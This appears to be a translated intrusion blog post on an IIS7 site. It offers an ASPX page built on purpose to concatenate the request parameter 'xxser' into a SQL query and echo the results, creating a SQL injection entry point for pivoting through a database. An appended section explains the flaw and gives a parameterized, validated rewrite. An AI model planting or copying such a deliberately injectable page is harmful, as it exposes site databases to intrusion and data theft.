Yesterday 4z1 and I were looking at a site; privilege escalation was really hard. We spent a full 5 hours on it with no result. 2008 + IIS7, no sa, no root, none of the usual services...
Actually, along the way we used aspx to construct an injection for cross-site access. I found a pile of code online and not a single one worked.
It isn't much code, so I just wrote one myself. So annoying.
Author: xxser
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>暗影aspx构造注射专用页面</title>
</head>
<body>
    <form id="form1" runat="server">
    <div>
        <script language="c#" runat="server">
            // Runs on page init; AutoEventWireup binds it by name.
            void Page_Init(object sender, EventArgs e)
            {
                System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
                // "连接名" is the name of a connection string in web.config (placeholder)
                conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
                conn.Open();
                string i = this.Page.Request.Params["xxser"]; // the parameter here is ?xxser=1
                // "[表]" and "列名" are placeholders for the table and column name;
                // the request value is concatenated straight into the SQL text
                System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名=" + i, conn);
                int x = command.ExecuteNonQuery();
                Response.Write(i + "\n");
                Response.Write(x);
                conn.Close();
            }
        </script>
    </div>
    </form>
</body>
</html>
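What makes the page above usable as an injection vector is the concatenation `"... where 列名=" + i`: whatever arrives in `?xxser=` becomes part of the SQL statement, and the page then echoes the input and any database error back to the client. As an added example (not the author's code), here is the same lookup written the way a site owner would need it, with the value bound as a typed SqlParameter; `ConnName`, `SomeTable` and `SomeColumn` are placeholders standing in for the post's `连接名`, `[表]` and `列名`.

```aspx
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<%@ Import Namespace="System.Configuration" %>
<script runat="server">
    // Same lookup as the page above, but the user-supplied value never
    // becomes part of the SQL text. ConnName, SomeTable and SomeColumn are
    // placeholders (assumptions), like the originals in the post.
    void Page_Init(object sender, EventArgs e)
    {
        string raw = Request.Params["xxser"];
        int id;
        // Type check first: anything that is not an integer is rejected
        // before a connection is opened or a statement is built.
        if (!int.TryParse(raw, out id))
        {
            Response.StatusCode = 400;
            Response.End();
            return;
        }

        string connStr = ConfigurationManager.ConnectionStrings["ConnName"].ConnectionString;
        // Table and column names cannot be parameters; here they are constants,
        // never derived from the request.
        const string sql = "SELECT * FROM [SomeTable] WHERE [SomeColumn] = @id";

        using (SqlConnection conn = new SqlConnection(connStr))
        using (SqlCommand cmd = new SqlCommand(sql, conn))
        {
            // The value travels separately from the statement, so quotes,
            // comment markers or UNION clauses in the input cannot alter the query.
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
            conn.Open();
            int rows = 0;
            using (SqlDataReader reader = cmd.ExecuteReader())
            {
                while (reader.Read()) rows++;
            }
            // Return only a count: the original page's Response.Write of the raw
            // input and of SQL error text is what makes error-based probing easy.
            Response.Write(HttpUtility.HtmlEncode(rows.ToString()));
        }
    }
</script>
```

Set `customErrors mode="On"` in web.config as well, so that a failing query yields a generic error page rather than the SQL Server message text.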